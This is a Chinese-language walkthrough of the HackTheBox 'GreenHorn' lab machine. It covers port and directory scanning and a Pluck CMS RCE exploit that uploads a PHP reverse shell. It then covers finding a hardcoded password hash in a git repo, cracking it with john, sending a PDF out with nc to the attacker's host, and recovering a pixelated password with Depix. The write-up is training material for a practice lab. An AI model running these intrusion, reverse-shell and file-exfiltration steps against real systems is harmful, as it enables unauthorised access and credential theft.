信息收集:
nmap --top-ports 10000 -T4 10.10.11.25 -Pn
nmap -p22,80,3000 -sTVC 10.10.11.25
扫着目录
gobuster dir -u "http://greenhorn.htb" -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --exclude-length 0
看Web:
介绍+欢迎新员工,套话,没什么信息,有个登录页面:
CMS是pluck,搜索是有RCE漏洞的:
# 直接使用searchsploit 拉下来的 poyload 不好看
searchsploit pluck -m php/webapps/51592.py
使用github中的POC,链接:https://github.com/Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC
把POC仓库拉下来,修改poc.py中的目标url地址:
使用 https://github.com/pentestmonkey/php-reverse-shell 创建php反弹shell,然后压缩到payload.zip中:
zip -r payload.zip shell.php
执行POC,看输出木马是传上去了,但是没找到上传后的路径:
挂上代理看下怎么回事:
の我并不了解这个漏洞,但是我看应该是翻车了。这个漏洞不是未授权RCE吗?怎么上传还显示登录未成功??、
额,翻了一圈发现这个是需要授权的,刚那个POC误我……
这得找登录密码了,但是刚web没扫出来什么敏感目录,爆破密码应该不是这个靶机想要的。
刚扫除的3000端口是个git托管服务,还存储着web服务代码(这个场景是不是似曾相识,之前的HTB-Compiled 打点篇遇到过):
克隆下来,找敏感信息:
# 寻找密码关键字
grep -r -e "pass" -e "password" . | grep "="
登录时的密码校验逻辑是和ww进行比较,硬编码?
找到了硬编码的密码:
识别类型为 sha512 的:
使用john解出来密码是我中意你:
然后把密码填到刚才的poc脚本里,本以为这下应该没问题了,但是显示登录次数过多,5分钟后再试,哪个哥哥在爆破?这么暴力吗?
等了5分钟,弹过来shell:
在 /home/junior 目录找到了user flag,但是无权读。使用python优化下shell的交互,原来的太难受了:
python3 -c 'import pty;pty.spawn("/bin/bash")
export TERM=xterm-256color
查找特权文件:
find / -type f -user junior 2>/dev/null
原来3000端口的git服务就是junior用户起的,使用git中泄露的密码可切换到junior用户,读到flag,有点鸡肋。
这个靶机的提权更鸡肋,竟然是去马赛克~
把junior用户目录下面显眼的pdf文件down下来,可以使用python起web服务,也可是使用nc等:
靶机:nc 10.10.14.32 8088 < 'Open OpenVAS.pdf'
主机:nc -lvp 8088 > 'OpenVAS.pdf'
打开pdf文件发现打上马赛克的密码:
接下来是去除马赛克。先下载pdfimages,用来从pdf中提取内嵌图片:
sudo apt install poppler-utils
pdfimages ./OpenVAS.pdf extrated-images
得到像素化图片:
使用 Depix 工具从像素化图片中提取文字:
获取密码,结束:
原文始发于微信公众号(KeepHack1ng):HTB-GreenHorn
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论